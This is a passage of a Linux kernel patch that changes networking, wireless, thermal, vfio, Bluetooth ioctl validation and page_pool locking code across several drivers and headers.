+@@ -540,8 +660,6 @@ mlxsw_thermal_module_init(struct device *dev, struct mlxsw_core *core,
+ 	module_tz->parent = thermal;
+ 	memcpy(module_tz->trips, default_thermal_trips,
+ 	       sizeof(thermal->trips));
+-	memcpy(module_tz->cooling_states, default_cooling_states,
+-	       sizeof(thermal->cooling_states));
+ 	/* Initialize all trip point. */
+ 	mlxsw_thermal_module_trips_reset(module_tz);
+ 	/* Read module temperature and thresholds. */
+@@ -637,8 +755,7 @@ mlxsw_thermal_gearbox_tz_init(struct mlxsw_thermal_module *gearbox_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-gearbox%d",
+ 			 gearbox_tz->module + 1);
+-	gearbox_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
+-						gearbox_tz->trips,
++	gearbox_tz->tzdev = thermal_zone_device_register(tz_name,
+ 						MLXSW_THERMAL_NUM_TRIPS,
+ 						MLXSW_THERMAL_TRIP_MASK,
+ 						gearbox_tz,
+@@ -695,8 +812,6 @@ mlxsw_thermal_gearboxes_init(struct device *dev, struct mlxsw_core *core,
+ 		gearbox_tz = &area->tz_gearbox_arr[i];
+ 		memcpy(gearbox_tz->trips, default_thermal_trips,
+ 		       sizeof(thermal->trips));
+-		memcpy(gearbox_tz->cooling_states, default_cooling_states,
+-		       sizeof(thermal->cooling_states));
+ 		gearbox_tz->module = i;
+ 		gearbox_tz->parent = thermal;
+ 		gearbox_tz->slot_index = area->slot_index;
+@@ -812,7 +927,6 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 	thermal->core = core;
+ 	thermal->bus_info = bus_info;
+ 	memcpy(thermal->trips, default_thermal_trips, sizeof(thermal->trips));
+-	memcpy(thermal->cooling_states, default_cooling_states, sizeof(thermal->cooling_states));
+ 	thermal->line_cards[0].slot_index = 0;
+ 
+ 	err = mlxsw_reg_query(thermal->core, MLXSW_REG(mfcr), mfcr_pl);
+@@ -862,8 +976,7 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 				 MLXSW_THERMAL_SLOW_POLL_INT :
+ 				 MLXSW_THERMAL_POLL_INT;
+ 
+-	thermal->tzdev = thermal_zone_device_register_with_trips("mlxsw",
+-						      thermal->trips,
++	thermal->tzdev = thermal_zone_device_register("mlxsw",
+ 						      MLXSW_THERMAL_NUM_TRIPS,
+ 						      MLXSW_THERMAL_TRIP_MASK,
+ 						      thermal,
+diff --git a/drivers/net/phy/mscc/mscc.h b/drivers/net/phy/mscc/mscc.h
+index a50235fdf7d99..055e4ca5b3b5c 100644
+--- a/drivers/net/phy/mscc/mscc.h
++++ b/drivers/net/phy/mscc/mscc.h
+@@ -179,6 +179,7 @@ enum rgmii_clock_delay {
+ #define VSC8502_RGMII_CNTL		  20
+ #define VSC8502_RGMII_RX_DELAY_MASK	  0x0070
+ #define VSC8502_RGMII_TX_DELAY_MASK	  0x0007
++#define VSC8502_RGMII_RX_CLK_DISABLE	  0x0800
+ 
+ #define MSCC_PHY_WOL_LOWER_MAC_ADDR	  21
+ #define MSCC_PHY_WOL_MID_MAC_ADDR	  22
+diff --git a/drivers/net/phy/mscc/mscc_main.c b/drivers/net/phy/mscc/mscc_main.c
+index f778e4f8b5080..7bd940baec595 100644
+--- a/drivers/net/phy/mscc/mscc_main.c
++++ b/drivers/net/phy/mscc/mscc_main.c
+@@ -527,14 +527,27 @@ out_unlock:
+  *  * 2.0 ns (which causes the data to be sampled at exactly half way between
+  *    clock transitions at 1000 Mbps) if delays should be enabled
+  */
+-static int vsc85xx_rgmii_set_skews(struct phy_device *phydev, u32 rgmii_cntl,
+-				   u16 rgmii_rx_delay_mask,
+-				   u16 rgmii_tx_delay_mask)
++static int vsc85xx_update_rgmii_cntl(struct phy_device *phydev, u32 rgmii_cntl,
++				     u16 rgmii_rx_delay_mask,
++				     u16 rgmii_tx_delay_mask)
+ {
+ 	u16 rgmii_rx_delay_pos = ffs(rgmii_rx_delay_mask) - 1;
+ 	u16 rgmii_tx_delay_pos = ffs(rgmii_tx_delay_mask) - 1;
+ 	u16 reg_val = 0;
+-	int rc;
++	u16 mask = 0;
++	int rc = 0;
++
++	/* For traffic to pass, the VSC8502 family needs the RX_CLK disable bit
++	 * to be unset for all PHY modes, so do that as part of the paged
++	 * register modification.
++	 * For some family members (like VSC8530/31/40/41) this bit is reserved
++	 * and read-only, and the RX clock is enabled by default.
++	 */
++	if (rgmii_cntl == VSC8502_RGMII_CNTL)
++		mask |= VSC8502_RGMII_RX_CLK_DISABLE;
++
++	if (phy_interface_is_rgmii(phydev))
++		mask |= rgmii_rx_delay_mask | rgmii_tx_delay_mask;
+ 
+ 	mutex_lock(&phydev->lock);
+ 
+@@ -545,10 +558,9 @@ static int vsc85xx_rgmii_set_skews(struct phy_device *phydev, u32 rgmii_cntl,
+ 	    phydev->interface == PHY_INTERFACE_MODE_RGMII_ID)
+ 		reg_val |= RGMII_CLK_DELAY_2_0_NS << rgmii_tx_delay_pos;
+ 
+-	rc = phy_modify_paged(phydev, MSCC_PHY_PAGE_EXTENDED_2,
+-			      rgmii_cntl,
+-			      rgmii_rx_delay_mask | rgmii_tx_delay_mask,
+-			      reg_val);
++	if (mask)
++		rc = phy_modify_paged(phydev, MSCC_PHY_PAGE_EXTENDED_2,
++				      rgmii_cntl, mask, reg_val);
+ 
+ 	mutex_unlock(&phydev->lock);
+ 
+@@ -557,19 +569,11 @@ static int vsc85xx_rgmii_set_skews(struct phy_device *phydev, u32 rgmii_cntl,
+ 
+ static int vsc85xx_default_config(struct phy_device *phydev)
+ {
+-	int rc;
+-
+ 	phydev->mdix_ctrl = ETH_TP_MDI_AUTO;
+ 
+-	if (phy_interface_mode_is_rgmii(phydev->interface)) {
+-		rc = vsc85xx_rgmii_set_skews(phydev, VSC8502_RGMII_CNTL,
+-					     VSC8502_RGMII_RX_DELAY_MASK,
+-					     VSC8502_RGMII_TX_DELAY_MASK);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	return 0;
++	return vsc85xx_update_rgmii_cntl(phydev, VSC8502_RGMII_CNTL,
++					 VSC8502_RGMII_RX_DELAY_MASK,
++					 VSC8502_RGMII_TX_DELAY_MASK);
+ }
+ 
+ static int vsc85xx_get_tunable(struct phy_device *phydev,
+@@ -1766,13 +1770,11 @@ static int vsc8584_config_init(struct phy_device *phydev)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (phy_interface_is_rgmii(phydev)) {
+-		ret = vsc85xx_rgmii_set_skews(phydev, VSC8572_RGMII_CNTL,
+-					      VSC8572_RGMII_RX_DELAY_MASK,
+-					      VSC8572_RGMII_TX_DELAY_MASK);
+-		if (ret)
+-			return ret;
+-	}
++	ret = vsc85xx_update_rgmii_cntl(phydev, VSC8572_RGMII_CNTL,
++					VSC8572_RGMII_RX_DELAY_MASK,
++					VSC8572_RGMII_TX_DELAY_MASK);
++	if (ret)
++		return ret;
+ 
+ 	ret = genphy_soft_reset(phydev);
+ 	if (ret)
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h b/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h
+index df0833890e55a..8a613e150a024 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h
+@@ -767,7 +767,7 @@ struct iwl_wowlan_status_v12 {
+ } __packed; /* WOWLAN_STATUSES_RSP_API_S_VER_12 */
+ 
+ /**
+- * struct iwl_wowlan_info_notif - WoWLAN information notification
++ * struct iwl_wowlan_info_notif_v1 - WoWLAN information notification
+  * @gtk: GTK data
+  * @igtk: IGTK data
+  * @replay_ctr: GTK rekey replay counter
+@@ -785,7 +785,7 @@ struct iwl_wowlan_status_v12 {
+  * @station_id: station id
+  * @reserved2: reserved
+  */
+-struct iwl_wowlan_info_notif {
++struct iwl_wowlan_info_notif_v1 {
+ 	struct iwl_wowlan_gtk_status_v3 gtk[WOWLAN_GTK_KEYS_NUM];
+ 	struct iwl_wowlan_igtk_status igtk[WOWLAN_IGTK_KEYS_NUM];
+ 	__le64 replay_ctr;
+@@ -803,6 +803,39 @@ struct iwl_wowlan_info_notif {
+ 	u8 reserved2[2];
+ } __packed; /* WOWLAN_INFO_NTFY_API_S_VER_1 */
+ 
++/**
++ * struct iwl_wowlan_info_notif - WoWLAN information notification
++ * @gtk: GTK data
++ * @igtk: IGTK data
++ * @replay_ctr: GTK rekey replay counter
++ * @pattern_number: number of the matched patterns
++ * @reserved1: reserved
++ * @qos_seq_ctr: QoS sequence counters to use next
++ * @wakeup_reasons: wakeup reasons, see &enum iwl_wowlan_wakeup_reason
++ * @num_of_gtk_rekeys: number of GTK rekeys
++ * @transmitted_ndps: number of transmitted neighbor discovery packets
++ * @received_beacons: number of received beacons
++ * @tid_tear_down: bit mask of tids whose BA sessions were closed
++ *	in suspend state
++ * @station_id: station id
++ * @reserved2: reserved
++ */
++struct iwl_wowlan_info_notif {
++	struct iwl_wowlan_gtk_status_v3 gtk[WOWLAN_GTK_KEYS_NUM];
++	struct iwl_wowlan_igtk_status igtk[WOWLAN_IGTK_KEYS_NUM];
++	__le64 replay_ctr;
++	__le16 pattern_number;
++	__le16 reserved1;
++	__le16 qos_seq_ctr[8];
++	__le32 wakeup_reasons;
++	__le32 num_of_gtk_rekeys;
++	__le32 transmitted_ndps;
++	__le32 received_beacons;
++	u8 tid_tear_down;
++	u8 station_id;
++	u8 reserved2[2];
++} __packed; /* WOWLAN_INFO_NTFY_API_S_VER_2 */
++
+ /**
+  * struct iwl_wowlan_wake_pkt_notif - WoWLAN wake packet notification
+  * @wake_packet_length: wakeup packet length
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index bbdda3e1ff3fc..c876e81437fee 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -2011,6 +2011,12 @@ static void iwl_mvm_parse_wowlan_info_notif(struct iwl_mvm *mvm,
+ {
+ 	u32 i;
+ 
++	if (!data) {
++		IWL_ERR(mvm, "iwl_wowlan_info_notif data is NULL\n");
++		status = NULL;
++		return;
++	}
++
+ 	if (len < sizeof(*data)) {
+ 		IWL_ERR(mvm, "Invalid WoWLAN info notification!\n");
+ 		status = NULL;
+@@ -2698,10 +2704,15 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 	struct iwl_d3_data *d3_data = data;
+ 	u32 len;
+ 	int ret;
++	int wowlan_info_ver = iwl_fw_lookup_notif_ver(mvm->fw,
++						      PROT_OFFLOAD_GROUP,
++						      WOWLAN_INFO_NOTIFICATION,
++						      IWL_FW_CMD_VER_UNKNOWN);
++
+ 
+ 	switch (WIDE_ID(pkt->hdr.group_id, pkt->hdr.cmd)) {
+ 	case WIDE_ID(PROT_OFFLOAD_GROUP, WOWLAN_INFO_NOTIFICATION): {
+-		struct iwl_wowlan_info_notif *notif = (void *)pkt->data;
++		struct iwl_wowlan_info_notif *notif;
+ 
+ 		if (d3_data->notif_received & IWL_D3_NOTIF_WOWLAN_INFO) {
+ 			/* We might get two notifications due to dual bss */
+@@ -2710,10 +2721,32 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 			break;
+ 		}
+ 
++		if (wowlan_info_ver < 2) {
++			struct iwl_wowlan_info_notif_v1 *notif_v1 = (void *)pkt->data;
++
++			notif = kmemdup(notif_v1,
++					offsetofend(struct iwl_wowlan_info_notif,
++						    received_beacons),
++					GFP_ATOMIC);
++
++			if (!notif)
++				return false;
++
++			notif->tid_tear_down = notif_v1->tid_tear_down;
++			notif->station_id = notif_v1->station_id;
++
++		} else {
++			notif = (void *)pkt->data;
++		}
++
+ 		d3_data->notif_received |= IWL_D3_NOTIF_WOWLAN_INFO;
+ 		len = iwl_rx_packet_payload_len(pkt);
+ 		iwl_mvm_parse_wowlan_info_notif(mvm, notif, d3_data->status,
+ 						len);
++
++		if (wowlan_info_ver < 2)
++			kfree(notif);
++
+ 		if (d3_data->status &&
+ 		    d3_data->status->wakeup_reasons & IWL_WOWLAN_WAKEUP_REASON_HAS_WAKEUP_PKT)
+ 			/* We are supposed to get also wake packet notif */
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c.c b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+index 67653b3e1a356..3109114cec6ff 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+@@ -1484,18 +1484,19 @@ static void rtw8852c_5m_mask(struct rtw89_dev *rtwdev,
+ 			     const struct rtw89_chan *chan,
+ 			     enum rtw89_phy_idx phy_idx)
+ {
+-	u8 pri_ch = chan->primary_channel;
++	u8 pri_ch = chan->pri_ch_idx;
+ 	bool mask_5m_low;
+ 	bool mask_5m_en;
+ 
+ 	switch (chan->band_width) {
+ 	case RTW89_CHANNEL_WIDTH_40:
+ 		mask_5m_en = true;
+-		mask_5m_low = pri_ch == 2;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWER;
+ 		break;
+ 	case RTW89_CHANNEL_WIDTH_80:
+-		mask_5m_en = ((pri_ch == 3) || (pri_ch == 4));
+-		mask_5m_low = pri_ch == 4;
++		mask_5m_en = pri_ch == RTW89_SC_20_UPMOST ||
++			     pri_ch == RTW89_SC_20_LOWEST;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWEST;
+ 		break;
+ 	default:
+ 		mask_5m_en = false;
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index 0acc0b6221290..dc9803e1a4b9b 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -245,24 +245,29 @@ static const struct pci_device_id pmf_pci_ids[] = {
+ 	{ }
+ };
+ 
+-int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev)
++static void amd_pmf_set_dram_addr(struct amd_pmf_dev *dev)
+ {
+ 	u64 phys_addr;
+ 	u32 hi, low;
+ 
+-	INIT_DELAYED_WORK(&dev->work_buffer, amd_pmf_get_metrics);
++	phys_addr = virt_to_phys(dev->buf);
++	hi = phys_addr >> 32;
++	low = phys_addr & GENMASK(31, 0);
++
++	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_HIGH, 0, hi, NULL);
++	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_LOW, 0, low, NULL);
++}
+ 
++int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev)
++{
+ 	/* Get Metrics Table Address */
+ 	dev->buf = kzalloc(sizeof(dev->m_table), GFP_KERNEL);
+ 	if (!dev->buf)
+ 		return -ENOMEM;
+ 
+-	phys_addr = virt_to_phys(dev->buf);
+-	hi = phys_addr >> 32;
+-	low = phys_addr & GENMASK(31, 0);
++	INIT_DELAYED_WORK(&dev->work_buffer, amd_pmf_get_metrics);
+ 
+-	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_HIGH, 0, hi, NULL);
+-	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_LOW, 0, low, NULL);
++	amd_pmf_set_dram_addr(dev);
+ 
+ 	/*
+ 	 * Start collecting the metrics data after a small delay
+@@ -273,6 +278,18 @@ int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev)
+ 	return 0;
+ }
+ 
++static int amd_pmf_resume_handler(struct device *dev)
++{
++	struct amd_pmf_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->buf)
++		amd_pmf_set_dram_addr(pdev);
++
++	return 0;
++}
++
++static DEFINE_SIMPLE_DEV_PM_OPS(amd_pmf_pm, NULL, amd_pmf_resume_handler);
++
+ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ {
+ 	int ret;
+@@ -414,6 +431,7 @@ static struct platform_driver amd_pmf_driver = {
+ 		.name = "amd-pmf",
+ 		.acpi_match_table = amd_pmf_acpi_ids,
+ 		.dev_groups = amd_pmf_driver_groups,
++		.pm = pm_sleep_ptr(&amd_pmf_pm),
+ 	},
+ 	.probe = amd_pmf_probe,
+ 	.remove = amd_pmf_remove,
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 7fa68dc4e938a..009ba186652ac 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -936,6 +936,11 @@ again:
+ 		if (ret)
+ 			goto pin_unwind;
+ 
++		if (!pfn_valid(phys_pfn)) {
++			ret = -EINVAL;
++			goto pin_unwind;
++		}
++
+ 		ret = vfio_add_to_pfn_list(dma, iova, phys_pfn);
+ 		if (ret) {
+ 			if (put_pfn(phys_pfn, dma->prot) && do_accounting)
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 20ca1613f2e3e..cc5ed2cf25f65 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -1567,6 +1567,16 @@ static inline void skb_copy_hash(struct sk_buff *to, const struct sk_buff *from)
+ 	to->l4_hash = from->l4_hash;
+ };
+ 
++static inline int skb_cmp_decrypted(const struct sk_buff *skb1,
++				    const struct sk_buff *skb2)
++{
++#ifdef CONFIG_TLS_DEVICE
++	return skb2->decrypted - skb1->decrypted;
++#else
++	return 0;
++#endif
++}
++
+ static inline void skb_copy_decrypted(struct sk_buff *to,
+ 				      const struct sk_buff *from)
+ {
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index 84f787416a54d..054d7911bfc9f 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -71,7 +71,6 @@ struct sk_psock_link {
+ };
+ 
+ struct sk_psock_work_state {
+-	struct sk_buff			*skb;
+ 	u32				len;
+ 	u32				off;
+ };
+@@ -105,7 +104,7 @@ struct sk_psock {
+ 	struct proto			*sk_proto;
+ 	struct mutex			work_mutex;
+ 	struct sk_psock_work_state	work_state;
+-	struct work_struct		work;
++	struct delayed_work		work;
+ 	struct rcu_work			rwork;
+ };
+ 
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index bf5654ce711ef..51857117ac099 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -249,6 +249,10 @@ struct inet_sock {
+ 	__be32			mc_addr;
+ 	struct ip_mc_socklist __rcu	*mc_list;
+ 	struct inet_cork_full	cork;
++	struct {
++		__u16 lo;
++		__u16 hi;
++	}			local_port_range;
+ };
+ 
+ #define IPCORK_OPT	1	/* ip-options has been held in ipcork.opt */
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 144bdfbb25afe..acec504c469a0 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -76,6 +76,7 @@ struct ipcm_cookie {
+ 	__be32			addr;
+ 	int			oif;
+ 	struct ip_options_rcu	*opt;
++	__u8			protocol;
+ 	__u8			ttl;
+ 	__s16			tos;
+ 	char			priority;
+@@ -96,6 +97,7 @@ static inline void ipcm_init_sk(struct ipcm_cookie *ipcm,
+ 	ipcm->sockc.tsflags = inet->sk.sk_tsflags;
+ 	ipcm->oif = READ_ONCE(inet->sk.sk_bound_dev_if);
+ 	ipcm->addr = inet->inet_saddr;
++	ipcm->protocol = inet->inet_num;
+ }
+ 
+ #define IPCB(skb) ((struct inet_skb_parm*)((skb)->cb))
+@@ -340,7 +342,8 @@ static inline u64 snmp_fold_field64(void __percpu *mib, int offt, size_t syncp_o
+ 	} \
+ }
+ 
+-void inet_get_local_port_range(struct net *net, int *low, int *high);
++void inet_get_local_port_range(const struct net *net, int *low, int *high);
++void inet_sk_get_local_port_range(const struct sock *sk, int *low, int *high);
+ 
+ #ifdef CONFIG_SYSCTL
+ static inline bool inet_is_local_reserved_port(struct net *net, unsigned short port)
+diff --git a/include/net/page_pool.h b/include/net/page_pool.h
+index 813c93499f201..ad0bafc877d48 100644
+--- a/include/net/page_pool.h
++++ b/include/net/page_pool.h
+@@ -383,22 +383,4 @@ static inline void page_pool_nid_changed(struct page_pool *pool, int new_nid)
+ 		page_pool_update_nid(pool, new_nid);
+ }
+ 
+-static inline void page_pool_ring_lock(struct page_pool *pool)
+-	__acquires(&pool->ring.producer_lock)
+-{
+-	if (in_serving_softirq())
+-		spin_lock(&pool->ring.producer_lock);
+-	else
+-		spin_lock_bh(&pool->ring.producer_lock);
+-}
+-
+-static inline void page_pool_ring_unlock(struct page_pool *pool)
+-	__releases(&pool->ring.producer_lock)
+-{
+-	if (in_serving_softirq())
+-		spin_unlock(&pool->ring.producer_lock);
+-	else
+-		spin_unlock_bh(&pool->ring.producer_lock);
+-}
+-
+ #endif /* _NET_PAGE_POOL_H */
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 5b70b241ce71b..0744717f5caa7 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -1467,6 +1467,8 @@ static inline void tcp_adjust_rcv_ssthresh(struct sock *sk)
+ }
+ 
+ void tcp_cleanup_rbuf(struct sock *sk, int copied);
++void __tcp_cleanup_rbuf(struct sock *sk, int copied);
++
+ 
+ /* We provision sk_rcvbuf around 200% of sk_rcvlowat.
+  * If 87.5 % (7/8) of the space has been consumed, we want to override
+@@ -2291,6 +2293,14 @@ int tcp_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool restore);
+ void tcp_bpf_clone(const struct sock *sk, struct sock *newsk);
+ #endif /* CONFIG_BPF_SYSCALL */
+ 
++#ifdef CONFIG_INET
++void tcp_eat_skb(struct sock *sk, struct sk_buff *skb);
++#else
++static inline void tcp_eat_skb(struct sock *sk, struct sk_buff *skb)
++{
++}
++#endif
++
+ int tcp_bpf_sendmsg_redir(struct sock *sk, bool ingress,
+ 			  struct sk_msg *msg, u32 bytes, int flags);
+ #endif /* CONFIG_NET_SOCK_MSG */
+diff --git a/include/net/tls.h b/include/net/tls.h
+index 154949c7b0c88..c36bf4c50027e 100644
+--- a/include/net/tls.h
++++ b/include/net/tls.h
+@@ -124,6 +124,7 @@ struct tls_strparser {
+ 	u32 mark : 8;
+ 	u32 stopped : 1;
+ 	u32 copy_mode : 1;
++	u32 mixed_decrypted : 1;
+ 	u32 msg_ready : 1;
+ 
+ 	struct strp_msg stm;
+diff --git a/include/uapi/linux/in.h b/include/uapi/linux/in.h
+index 07a4cb149305b..e682ab628dfa6 100644
+--- a/include/uapi/linux/in.h
++++ b/include/uapi/linux/in.h
+@@ -162,6 +162,8 @@ struct in_addr {
+ #define MCAST_MSFILTER			48
+ #define IP_MULTICAST_ALL		49
+ #define IP_UNICAST_IF			50
++#define IP_LOCAL_PORT_RANGE		51
++#define IP_PROTOCOL			52
+ 
+ #define MCAST_EXCLUDE	0
+ #define MCAST_INCLUDE	1
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index f597fe0db9f8f..1d249d839819d 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -987,6 +987,34 @@ static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
+ 
+ 	BT_DBG("cmd %x arg %lx", cmd, arg);
+ 
++	/* Make sure the cmd is valid before doing anything */
++	switch (cmd) {
++	case HCIGETDEVLIST:
++	case HCIGETDEVINFO:
++	case HCIGETCONNLIST:
++	case HCIDEVUP:
++	case HCIDEVDOWN:
++	case HCIDEVRESET:
++	case HCIDEVRESTAT:
++	case HCISETSCAN:
++	case HCISETAUTH:
++	case HCISETENCRYPT:
++	case HCISETPTYPE:
++	case HCISETLINKPOL:
++	case HCISETLINKMODE:
++	case HCISETACLMTU:
++	case HCISETSCOMTU:
++	case HCIINQUIRY:
++	case HCISETRAW:
++	case HCIGETCONNINFO:
++	case HCIGETAUTHINFO:
++	case HCIBLOCKADDR:
++	case HCIUNBLOCKADDR:
++		break;
++	default:
++		return -ENOIOCTLCMD;
++	}
++
+ 	lock_sock(sk);
+ 
+ 	if (hci_pi(sk)->channel != HCI_CHANNEL_RAW) {
+diff --git a/net/core/page_pool.c b/net/core/page_pool.c
+index 9b203d8660e47..2396c99bedeaa 100644
+--- a/net/core/page_pool.c
++++ b/net/core/page_pool.c
+@@ -133,6 +133,29 @@ EXPORT_SYMBOL(page_pool_ethtool_stats_get);
+ #define recycle_stat_add(pool, __stat, val)
+ #endif
+ 
++static bool page_pool_producer_lock(struct page_pool *pool)
++	__acquires(&pool->ring.producer_lock)
++{
++	bool in_softirq = in_softirq();
++
++	if (in_softirq)
++		spin_lock(&pool->ring.producer_lock);
++	else
++		spin_lock_bh(&pool->ring.producer_lock);
++
++	return in_softirq;
++}
++
++static void page_pool_producer_unlock(struct page_pool *pool,
++				      bool in_softirq)
++	__releases(&pool->ring.producer_lock)
++{
++	if (in_softirq)
++		spin_unlock(&pool->ring.producer_lock);
++	else
++		spin_unlock_bh(&pool->ring.producer_lock);
++}
++
+ static int page_pool_init(struct page_pool *pool,
+ 			  const struct page_pool_params *params)
+ {
+@@ -511,8 +534,8 @@ static void page_pool_return_page(struct page_pool *pool, struct page *page)
+ static bool page_pool_recycle_in_ring(struct page_pool *pool, struct page *page)
+ {
+ 	int ret;
+-	/* BH protection not needed if current is serving softirq */
+-	if (in_serving_softirq())
++	/* BH protection not needed if current is softirq */
++	if (in_softirq())
+ 		ret = ptr_ring_produce(&pool->ring, page);
+ 	else
+ 		ret = ptr_ring_produce_bh(&pool->ring, page);
+@@ -570,7 +593,7 @@ __page_pool_put_page(struct page_pool *pool, struct page *page,
+ 			page_pool_dma_sync_for_device(pool, page,
+ 						      dma_sync_size);
+ 
+-		if (allow_direct && in_serving_softirq() &&
++		if (allow_direct && in_softirq() &&
+ 		    page_pool_recycle_in_cache(page, pool))
+ 			return NULL;
+ 
+@@ -615,6 +638,7 @@ void page_pool_put_page_bulk(struct page_pool *pool, void **data,
+ 			     int count)
+ {
+ 	int i, bulk_len = 0;
++	bool in_softirq;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		struct page *page = virt_to_head_page(data[i]);
+@@ -633,7 +657,7 @@ void page_pool_put_page_bulk(struct page_pool *pool, void **data,
+ 		return;
+ 
+ 	/* Bulk producer into ptr_ring page_pool cache */
+-	page_pool_ring_lock(pool);
++	in_softirq = page_pool_producer_lock(pool);
+ 	for (i = 0; i < bulk_len; i++) {
+ 		if (__ptr_ring_produce(&pool->ring, data[i])) {
+ 			/* ring full */
+@@ -642,7 +666,7 @@ void page_pool_put_page_bulk(struct page_pool *pool, void **data,
+ 		}
+ 	}
+ 	recycle_stat_add(pool, ring, i);
+-	page_pool_ring_unlock(pool);
++	page_pool_producer_unlock(pool, in_softirq);
+ 
+ 	/* Hopefully all pages was return into ptr_ring */
+ 	if (likely(i == bulk_len))
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 53d0251788aa2..9e0f694515636 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -480,8 +480,6 @@ int sk_msg_recvmsg(struct sock *sk, struct sk_psock *psock, struct msghdr *msg,
+ 		msg_rx = sk_psock_peek_msg(psock);
+ 	}
+ out:
+-	if (psock->work_state.skb && copied > 0)
+-		schedule_work(&psock->work);
+ 	return copied;
+ }
+ EXPORT_SYMBOL_GPL(sk_msg_recvmsg);
+@@ -623,42 +621,33 @@ static int sk_psock_handle_skb(struct sk_psock *psock, struct sk_buff *skb,
+ 
+ static void sk_psock_skb_state(struct sk_psock *psock,
+ 			       struct sk_psock_work_state *state,
+-			       struct sk_buff *skb,
+ 			       int len, int off)
+ {
+ 	spin_lock_bh(&psock->ingress_lock);
+ 	if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED)) {
+-		state->skb = skb;
+ 		state->len = len;
+ 		state->off = off;
+-	} else {
+-		sock_drop(psock->sk, skb);
+ 	}
+ 	spin_unlock_bh(&psock->ingress_lock);
+ }
+ 
+ static void sk_psock_backlog(struct work_struct *work)
+ {
+-	struct sk_psock *psock = container_of(work, struct sk_psock, work);
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct sk_psock *psock = container_of(dwork, struct sk_psock, work);
+ 	struct sk_psock_work_state *state = &psock->work_state;
+ 	struct sk_buff *skb = NULL;
++	u32 len = 0, off = 0;
+ 	bool ingress;
+-	u32 len, off;
+ 	int ret;
+ 
+ 	mutex_lock(&psock->work_mutex);
+-	if (unlikely(state->skb)) {
+-		spin_lock_bh(&psock->ingress_lock);
+-		skb = state->skb;
++	if (unlikely(state->len)) {
+ 		len = state->len;
+ 		off = state->off;
+-		state->skb = NULL;
+-		spin_unlock_bh(&psock->ingress_lock);
+ 	}
+-	if (skb)
+-		goto start;
+ 
+-	while ((skb = skb_dequeue(&psock->ingress_skb))) {
++	while ((skb = skb_peek(&psock->ingress_skb))) {
+ 		len = skb->len;
+ 		off = 0;
+ 		if (skb_bpf_strparser(skb)) {
+@@ -667,7 +656,6 @@ static void sk_psock_backlog(struct work_struct *work)
+ 			off = stm->offset;
+ 			len = stm->full_len;
+ 		}
+-start:
+ 		ingress = skb_bpf_ingress(skb);
+ 		skb_bpf_redirect_clear(skb);
+ 		do {
+@@ -677,22 +665,28 @@ start:
+ 							  len, ingress);
+ 			if (ret <= 0) {
+ 				if (ret == -EAGAIN) {
+-					sk_psock_skb_state(psock, state, skb,
+-							   len, off);
++					sk_psock_skb_state(psock, state, len, off);
++
++					/* Delay slightly to prioritize any
++					 * other work that might be here.
++					 */
++					if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED))
++						schedule_delayed_work(&psock->work, 1);
+ 					goto end;
+ 				}
+ 				/* Hard errors break pipe and stop xmit. */
+ 				sk_psock_report_error(psock, ret ? -ret : EPIPE);
